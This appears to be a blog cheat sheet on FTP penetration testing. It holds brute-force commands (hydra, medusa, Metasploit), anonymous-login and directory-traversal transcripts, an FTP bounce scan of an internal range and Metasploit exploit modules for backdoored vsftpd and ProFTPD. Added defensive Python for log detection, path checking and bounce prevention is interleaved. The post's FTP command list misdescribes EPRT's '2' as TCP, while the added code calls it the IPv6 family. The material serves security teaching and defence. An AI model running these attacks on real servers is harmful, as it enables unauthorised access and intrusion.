
FTP Pentesting Best Practices

FTP

FTP usually uses port 21

What is FTP?

FTP (File Transfer Protocol) is used to communicate and transfer files between computers on a TCP/IP (Transmission Control Protocol/Internet Protocol) network, i.e. the internet. Users who have been granted access can download and upload files on the File Transfer Protocol server (also known as the FTP host/site).

PORT     STATE SERVICE               VERSION
21/tcp   open  ftp                   ProFTPD 1.3.5  

FTP Pentesting

Shodan search query:
port:21
# Anonymous FTP Login query: "220" "230 Login successful." port:21
telnet 10.10.x.x 21
nc -nv 10.10.x.x 21
nmap -sV -p21 --script=banner 10.10.x.x

#Get certificate if any
openssl s_client -connect 10.10.x.x:21 -starttls ftp 

FTP Banner grabbing with nmap banner script

FTP Connection Tools

Linux:

ftp 10.10.x.x
# if FTP server running on different port and using ssl 
ftp-ssl 10.10.x.x 990

Windows:

  • Filezilla
  • Winscp

Connect to FTP using starttls

lftp
lftp :~> set ftp:ssl-force true
lftp :~> set ssl:verify-certificate no
lftp :~> connect 10.10.x.x
lftp 10.10.x.x:~> login                       
Usage: login <user|URL> [<pass>]
lftp 10.10.x.x:~> login username Password

Browser Connection

ftp://ftp.xyz.com
ftp://anonymous:anonymous@10.10.x.x # Anonymous login
ftp://username:password@ftp.secybr.com # Connecting with Firefox to an FTP server that requires a user name
ftp://0xhav0c:password@ftp.secybr.com # e.g. if my user name was 0xhav0c and my password was "password"
ftp://0xhav0c@secybr.com:password@ftp.secybr.com # In some cases the user name includes a domain name, such as 0xhav0c@secybr.com; then you would type this

Mount remote FTP locally

sudo apt-get install curlftpfs
mkdir /mnt/my_ftp
curlftpfs ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/
curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/ # To allow other users

Download Everything From FTP Server

root@Kali:~/ wget -m --no-passive ftp://anonymous:anonymous@10.10.x.x 
--2022-06-04 21:03:50-- 
ftp://anonymous:*password*@10.10.x.x/ 

=> ‘10.10.x.x/.listing’ 
Connecting to 10.10.x.x:21... connected. 
Logging in as anonymous ... Logged in! 
==> SYST ... done. ==> PWD ... done. 
==> TYPE I ... done. ==> CWD not needed. 
==> PORT ... done. ==> LIST ... done. 
10.10.x.x/.listing [ <=> ] 97 --.-KB/s in 0s 
==> PORT ... done. ==> LIST ... done. 
10.10.x.x/.listing [ <=> ] 97 --.-KB/s in 0s  
2022-06-04 21:03:50 (8.4 MB/s) - ‘10.10.x.x/.listing’ saved [194] 
--2022-06-04 21:03:50-- 
ftp://anonymous:*password*@10.10.x.x/Backups/ 

=> ‘10.10.x.x/Backups/.listing’ 
==> CWD (1) /Backups ... done. 
==> PORT ... done. ==> LIST ... done.

FTP Credentials

It might be helpful to try passive mode: a server that refuses an active-mode transfer may still let you connect in passive mode (ftp -p 192.168.x.x). In active FTP the client first opens the control connection from its port N to the FTP server's command port, port 21. The client then listens on port N+1 and tells the server that port number. The server initiates the data connection from its port M to port N+1 of the client. If the client sits behind a firewall that blocks incoming data connections, active FTP is a problem, and passive FTP is the usual solution. In passive FTP the client opens the control connection from its port N to port 21 of the server and then issues a PASV command. The server replies with one of its port numbers, M, and the client initiates the data connection from its port P to port M of the server.

File upload (PUT FileName.exe) or download (GET FileName.txt; mget FileName.txt) operations can be performed after login. For a file to be transferred without corruption, the transfer mode must be switched with the "binary" command if the file is binary and with the "ascii" command if it is ASCII text.

Anonymous Login Check Methods

#Manual Anonymous Login Combos
anonymous : anonymous
anonymous :
ftp : ftp

#Manual Anonymous Login With ftp-ssl
root@secyber.com:~ ftp-ssl -p 88.255.104.161 990
Connected to 88.255.104.161.
220 Service Ready.
Name (88.255.104.161:root): anonymous
234 Enabling TLS Connection
[SSL Cipher ECDHE-RSA-AES256-GCM-SHA384]
502 Not supported
502 Not supported
331 Username ok, need password
Password:
230 User logged in
Remote system type is UNIX.
Using binary mode to transfer files.

#Anonymous Login Check With Metasploit Framework
msf > use auxiliary/scanner/ftp/anonymous
set RHOSTS 10.10.x.x
set RPORT 21
run

#Nmap Script:
nmap --script=ftp-anon -p21 10.10.x.x
#or
nmap -sV -sC -p21 10.10.x.x

Valid Users and Password Detection Methods

msf > use auxiliary/scanner/ftp/ftp_login
set RHOSTS 10.10.x.x
set RPORT 21
set PASS_FILE /usr/share/wordlists/passwords.txt
set USER_FILE /usr/share/wordlists/users.txt
run

#Nmap Script:
nmap --script ftp-brute -p21 10.10.x.x

Anyone can log in to an FTP server if the administrator has allowed anonymous login. An attacker can log in anonymously using the Metasploit module above or the "ftp" tool.

FTP Brute Forcing Methods

hydra -t 2 -L user.list -P passwords.list -M targetIPs.list -s 21 ftp
medusa -t 2 -T 2 -U user.list -P passwords.list -H targetIPs.list -n 21 -M ftp
ncrack -g CL=2 -U user.list -P passwords.list -iL targetIPs.list -p ftp:21 -oA results.txt
patator ftp_login host=10.10.x.x user=FILE0 password=FILE1 0=users.list 1=passwords.list -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500

#Metasploit Framework:
msf > use auxiliary/scanner/ftp/ftp_login
set RHOSTS 10.10.x.x
set RPORT 21
set PASS_FILE /usr/share/wordlists/passwords.txt
set USER_FILE /usr/share/wordlists/users.txt
run
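
The defender's view of the two sections above (anonymous login checks and brute forcing) is what the server logs record. The following Python is an added example, not code from the original post: it parses login records in vsftpd's log format and flags successful anonymous logins and bursts of failed logins from a single client. The log lines are constructed samples, and the five-failures-in-five-minutes threshold, the window and the function names are assumptions to adjust for your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records in vsftpd's log format (not taken from the post):
# one anonymous login, a five-password burst from one client that ends in a
# successful login, and a normal user who mistyped a password once.
SAMPLE_LOG = """\
Sat Jun  4 21:03:50 2022 [pid 1201] CONNECT: Client "10.10.14.5"
Sat Jun  4 21:03:51 2022 [pid 1200] [anonymous] OK LOGIN: Client "10.10.14.5", anon password "anonymous"
Sat Jun  4 21:05:02 2022 [pid 1210] CONNECT: Client "10.10.14.9"
Sat Jun  4 21:05:03 2022 [pid 1209] [root] FAIL LOGIN: Client "10.10.14.9"
Sat Jun  4 21:05:04 2022 [pid 1209] [root] FAIL LOGIN: Client "10.10.14.9"
Sat Jun  4 21:05:05 2022 [pid 1209] [admin] FAIL LOGIN: Client "10.10.14.9"
Sat Jun  4 21:05:06 2022 [pid 1209] [ftpuser] FAIL LOGIN: Client "10.10.14.9"
Sat Jun  4 21:05:07 2022 [pid 1209] [backup] FAIL LOGIN: Client "10.10.14.9"
Sat Jun  4 21:05:09 2022 [pid 1209] [ftpuser] OK LOGIN: Client "10.10.14.9"
Sat Jun  4 21:40:00 2022 [pid 1220] [alice] FAIL LOGIN: Client "192.168.1.20"
Sat Jun  4 21:40:30 2022 [pid 1220] [alice] OK LOGIN: Client "192.168.1.20"
"""

# Timestamp, pid, optional [user], OK/FAIL LOGIN and the client address.
LOGIN_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<status>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)


def parse_login_events(text):
    """Return one dict per OK/FAIL LOGIN record; CONNECT and transfer lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m is None:
            continue
        events.append({
            "time": datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y"),
            "user": m.group("user") or "",
            "ok": m.group("status") == "OK",
            "client": m.group("client"),
        })
    return events


def find_anonymous_logins(events):
    """Successful logins as 'anonymous' or 'ftp', the combos the post lists."""
    return [e for e in events if e["ok"] and e["user"].lower() in ("anonymous", "ftp")]


def find_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Per client: flag >= threshold failed logins inside a sliding window and
    record whether a successful login followed the burst (a spray that worked)."""
    by_client = defaultdict(list)
    for e in events:
        by_client[e["client"]].append(e)
    alerts = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["time"])
        fails = [e["time"] for e in evs if not e["ok"]]
        start, burst_end = 0, None
        for i, t in enumerate(fails):
            while t - fails[start] > window:   # slide the window forward
                start += 1
            if i - start + 1 >= threshold:
                burst_end = t
                break                          # one alert per client is enough
        if burst_end is not None:
            alerts[client] = {
                "failures": len(fails),
                "users_tried": sorted({e["user"] for e in evs if not e["ok"]}),
                "success_after_burst": any(e["ok"] and e["time"] >= burst_end for e in evs),
            }
    return alerts


if __name__ == "__main__":
    events = parse_login_events(SAMPLE_LOG)
    for e in find_anonymous_logins(events):
        print(f"anonymous login from {e['client']} at {e['time']:%H:%M:%S}")
    for client, info in find_bruteforce(events).items():
        print(f"brute force from {client}: {info}")
```

The "success_after_burst" flag is the one worth paging on: a burst of failures that ends in a 230 means a guessed credential, not just noise. Anonymous logins are only a finding if the server is not meant to offer them, so compare the output against the intended configuration rather than treating every hit as an incident.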

Common FTP Vulnerabilities

Directory Traversal Attack

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating file paths with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories on the file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root): 
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
-rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Sep 23  2015 Program Files
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 WINDOWS
226 File sent ok
ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 26  2015 Administrateur
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 All Users
226 File sent ok
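
The server-side counterpart of the listing above, as an added example that is not part of the original post or of any particular FTP server's code: a path-resolution routine that maps client-supplied paths onto the daemon's root directory and refuses anything that climbs out of it. The root path, the function names and the sample requests (which include the two ../ listings from the transcript) are constructed assumptions.

```python
import posixpath
from typing import Optional

# Constructed example: the directory the FTP daemon serves (its virtual root).
# A real server takes this from its configuration.
FTP_ROOT = "/srv/ftp"


def resolve_ftp_path(root: str, cwd: str, requested: str) -> Optional[str]:
    """Map a client-supplied path to a real path under ``root``.

    ``cwd`` is the client's current directory in the virtual namespace
    ("/" is the FTP root). ``requested`` is the argument of LIST, CWD,
    RETR, STOR and friends. Returns the normalised real path, or None when
    the request would escape ``root``; the caller answers that with a 550
    and logs the attempt.
    """
    # A NUL byte has no place in a path and is a classic way to truncate a
    # filename inside a C runtime: refuse it outright.
    if "\x00" in requested:
        return None
    # Windows-hosted servers (like the one in the transcript above) accept
    # backslashes as separators, so normalise them before checking.
    requested = requested.replace("\\", "/")

    # An absolute client path is relative to the virtual root, not to "/".
    virtual = posixpath.join(cwd, requested)
    root_n = posixpath.normpath(root)
    real = posixpath.normpath(posixpath.join(root_n, virtual.lstrip("/")))

    # Lexical containment check: after collapsing every "." and "..", the
    # result must be the root itself or live strictly below it.
    prefix = root_n if root_n.endswith("/") else root_n + "/"
    if real != root_n and not real.startswith(prefix):
        return None
    return real


def audit_requests(root: str, requests):
    """Classify (cwd, path) pairs as served (real path) or refused (None)."""
    return {path: resolve_ftp_path(root, cwd, path) for cwd, path in requests}


if __name__ == "__main__":
    # Constructed sample requests, including the two from the transcript above.
    samples = [("/", "pub/readme.txt"), ("/pub", "../incoming/a.bin"),
               ("/", "../../../../"), ("/", "../../../../Docume~1/"),
               ("/pub", "..\\..\\Windows\\win.ini")]
    for path, result in audit_requests(FTP_ROOT, samples).items():
        print(f"{path!r:35} -> {result if result else 'REFUSED (550)'}")
```

This is the lexical check only; a server also has to resolve symlinks on the result (os.path.realpath) before opening it, or a link placed under the root can still point outside. Each refused request is also what a 550 reply and a log line should record, which is what makes traversal attempts visible in the server's own logs.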

FTP Bounce Vulnerability

An FTP server is vulnerable to FTP bounce attacks when it lets an FTP client instruct it to make an outbound data connection to any IP address and port, rather than restricting outbound data connections to the client's own IP address. This can be used to map and port scan any networks visible to the FTP server, possibly including internal networks not directly accessible to the attacker.

FTP bouncing is such a well-known and easy-to-exploit reconnaissance technique that tools such as nmap include an FTP bounce scan option.

FTP Bounce Vulnerability Check Method

nmap -sV --script ftp-bounce -p21 10.10.x.x
msf > use auxiliary/scanner/portscan/ftpbounce

Lastly, you can check manually. If the FTP server is affected by this vulnerability, you will get a result similar to the following:

USER A
331 Username okay, awaiting password
PASS A
230 User logged in, proceed
PORT 172,19,0,100,0,1234
200 The requested action has been successfully completed 
LIST
150 File status okay; about to open data connection // data connection succeeded: port 1234 is open
226 Closing data connection 
PORT 172,19,0,100,0,4444
200 The requested action has been successfully completed 
LIST
425 No connection established // data connection failed: port 4444 is closed

For example, an attacker using this vulnerability can scan ports in the internal network systems by using the following command:

nmap -v -p 21,22,445,80,443 -b username:password@172.19.0.100 192.168.0.1/24

Unsuccessful FTP bounce scan example output.

Successful FTP bounce scan example output.

Specific Vulnerabilities and Exploits, PoC’s and Nmap Scripts

#OPIE <= 2.4.1-test1 @ FreeBSD 6.4 – 8.1-PRERELEASE [CVE-2010-1938]
nmap --script=ftp-libopie -p21 10.10.x.x

#VSFTPD 2.3.4 [CVE-2011-2523]
nmap --script=ftp-vsftpd-backdoor -p21 10.10.x.x

#ProFTPd 1.3.3c [OSVDB 69562]
nmap --script=ftp-proftpd-backdoor -p21 10.10.x.x

#ProFTPD 1.3.2rc3 – 1.3.3b [CVE-2010-4221]
nmap --script=ftp-vuln-cve2010-4221 -p21 10.10.x.x

#Titan FTP Server <= 8.10.1125 – Directory Traversal [CVE-2010-2426]
msf > use auxiliary/scanner/ftp/titanftp_xcrc_traversal

#PCMan FTP Server 2.0.7 – Directory Traversal [CVE-2015-7601]
msf > use auxiliary/scanner/ftp/pcman_ftp_traversal

#Konica Minolta FTP Utility 1.00 – Directory Traversal [CVE-2015-7603]
msf > use auxiliary/scanner/ftp/konica_ftp_traversal

#BisonFTP Server 3.5 – Directory Traversal [CVE-2015-7602]
msf > use auxiliary/scanner/ftp/bison_ftp_traversal

#ColoradoFTP Server <= 1.3 Build 8 – Directory Traversal [EDB-40231]
msf > use auxiliary/scanner/ftp/colorado_ftp_traversal

#Easy File Sharing FTP Server <= 3.6 – Directory Traversal [CVE-2017-6510]
msf > use auxiliary/scanner/ftp/easy_file_sharing_ftp

#VSFTPD 2.3.4 [CVE-2011-2523]
msf > use exploit/unix/ftp/vsftpd_234_backdoor

#ProFTPD 1.3.2rc3 – 1.3.3b [CVE-2010-4221]
msf > use exploit/linux/ftp/proftp_telnet_iac

#ProFTPD 1.3.3c [OSVDB-69562]
msf > use exploit/unix/ftp/proftpd_133c_backdoor

#ProFTPd 1.3.5 mod_copy [CVE-2015-3306]
msf > use exploit/unix/ftp/proftpd_modcopy_exec
Exploit-DB: 36742.txt

#Konica Minolta FTP Utility 1.00 – CWD Command Overflow (SEH) [CVE-2015-7768]
Exploit-DB: 39215
msf > use exploit/windows/ftp/kmftp_utility_cwd

Download All Files From FTP Server

wget -m ftp://anonymous:anonymous@10.10.x.x #Download all (passive mode, wget's default)
wget -m --no-passive ftp://anonymous:anonymous@10.10.x.x #Download all (active mode)

Some FTP Commands

USER username / PASS password: Log in with the given user name and password.
HELP: The server indicates which commands are supported.
PORT 127,0,0,1,0,80: This tells the FTP server to establish a connection with the IP 127.0.0.1 on port 80 (the 5th and 6th values are the two bytes of the port number, high byte first, so for a port below 256 the 5th value is "0" and the 6th is the port in decimal).
EPRT |2|127.0.0.1|80|: This tells the FTP server to establish a TCP connection (indicated by "2") with the IP 127.0.0.1 on port 80. This command supports IPv6.
LIST: Sends the list of files in the current folder.
APPE /path/something.txt: Tells the FTP server to store the data received over a passive connection or a PORT/EPRT connection in a file. If the file exists, the data is appended.
STOR /path/something.txt: Like APPE, but it overwrites the file.
STOU /path/something.txt: Like APPE, but if the file exists it won't do anything.
RETR /path/to/file: A passive or PORT connection must be established first. The FTP server then sends the indicated file through that connection.
REST 6: Tells the server that the next RETR should start at the 6th byte.
TYPE i: Sets the transfer type to binary.
PASV: Opens a passive connection and tells the client where it can connect.
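
The active/passive explanation in the FTP Credentials section, the manual bounce check above and the PORT, EPRT and PASV entries in this list all hinge on how the data-connection address is encoded. The following Python is an added example, not code from the original post: it encodes and decodes the h1,h2,h3,h4,p1,p2 tuple shared by PORT and the 227 reply to PASV (a port above 255 occupies both bytes, so 1234 is 4,210), handles the |af|address|port| form of EPRT (the first field is the address family per RFC 2428, 1 for IPv4 and 2 for IPv6), and implements the check a server applies to refuse a PORT/EPRT target that is not the client's own address, which is what closes the FTP bounce issue described above. All addresses and ports used are constructed.

```python
import ipaddress
import re

# The h1,h2,h3,h4,p1,p2 tuple used by PORT (client -> server) and by the
# 227 reply to PASV (server -> client).
_HOST_PORT_RE = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def encode_port_args(host: str, port: int) -> str:
    """Build the argument of a PORT command: four address octets, then the
    port as two bytes (p1 = port // 256, p2 = port % 256)."""
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    octets = str(ipaddress.IPv4Address(host)).split(".")
    return ",".join(octets + [str(port >> 8), str(port & 0xFF)])


def decode_port_args(args: str) -> tuple:
    """Inverse of encode_port_args. The whole argument must be one tuple of
    values 0..255, so '0,1234' style arguments are rejected as malformed."""
    m = _HOST_PORT_RE.fullmatch(args.strip())
    if m is None:
        raise ValueError(f"not an h1,h2,h3,h4,p1,p2 tuple: {args!r}")
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise ValueError(f"value above 255 in {args!r}")
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def parse_pasv_reply(reply: str) -> tuple:
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).' -> (host, port) that
    the client must connect to for the data channel."""
    if not reply.startswith("227"):
        raise ValueError(f"not a 227 reply: {reply!r}")
    m = _HOST_PORT_RE.search(reply)
    if m is None:
        raise ValueError(f"no address tuple in {reply!r}")
    return decode_port_args(m.group(0))


def encode_eprt_args(host: str, port: int) -> str:
    """EPRT argument per RFC 2428: |af|address|port| with af 1 = IPv4, 2 = IPv6."""
    addr = ipaddress.ip_address(host)
    return f"|{1 if addr.version == 4 else 2}|{addr}|{port}|"


def decode_eprt_args(args: str) -> tuple:
    """Parse |af|address|port|; the first character is the delimiter."""
    args = args.strip()
    parts = args.split(args[0]) if args else []
    # "|2|::1|80|" splits into ['', '2', '::1', '80', '']
    if len(parts) != 5 or parts[1] not in ("1", "2"):
        raise ValueError(f"malformed EPRT argument {args!r}")
    addr = ipaddress.ip_address(parts[2])
    if (parts[1] == "1") != (addr.version == 4):
        raise ValueError(f"address family does not match address in {args!r}")
    return str(addr), int(parts[3])


def data_target_allowed(command: str, control_peer_ip: str) -> bool:
    """Server-side FTP bounce mitigation: honour PORT/EPRT only when the
    requested data-connection target is the address of the client that owns
    the control connection and the port is unprivileged (>= 1024). Any other
    host, and any malformed argument, is refused."""
    verb, _, args = command.strip().partition(" ")
    try:
        if verb.upper() == "PORT":
            host, port = decode_port_args(args)
        elif verb.upper() == "EPRT":
            host, port = decode_eprt_args(args)
        else:
            return False
    except ValueError:
        return False
    return ipaddress.ip_address(host) == ipaddress.ip_address(control_peer_ip) and port >= 1024


if __name__ == "__main__":
    # Constructed demo: a client at 10.10.0.7 points the data channel at itself
    # (allowed) and then at another host (refused, the bounce case).
    print(encode_port_args("10.10.0.7", 1234))                      # 10,10,0,7,4,210
    print(parse_pasv_reply("227 Entering Passive Mode (10,10,1,5,195,80)."))
    for cmd in ("PORT 10,10,0,7,4,210", "PORT 172,19,0,100,4,210"):
        print(cmd, "->", "allowed" if data_target_allowed(cmd, "10.10.0.7") else "refused")
```

Real servers expose this check as a setting, for example vsftpd's port_promiscuous and ProFTPD's AllowForeignAddress, both off by default; keeping them off is the fix for the bounce finding. The unprivileged-port condition additionally stops the data channel from being pointed at low ports on the client's own address.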

This post is licensed under CC BY 4.0 by the author.

Powered by 0xhav0c © 2022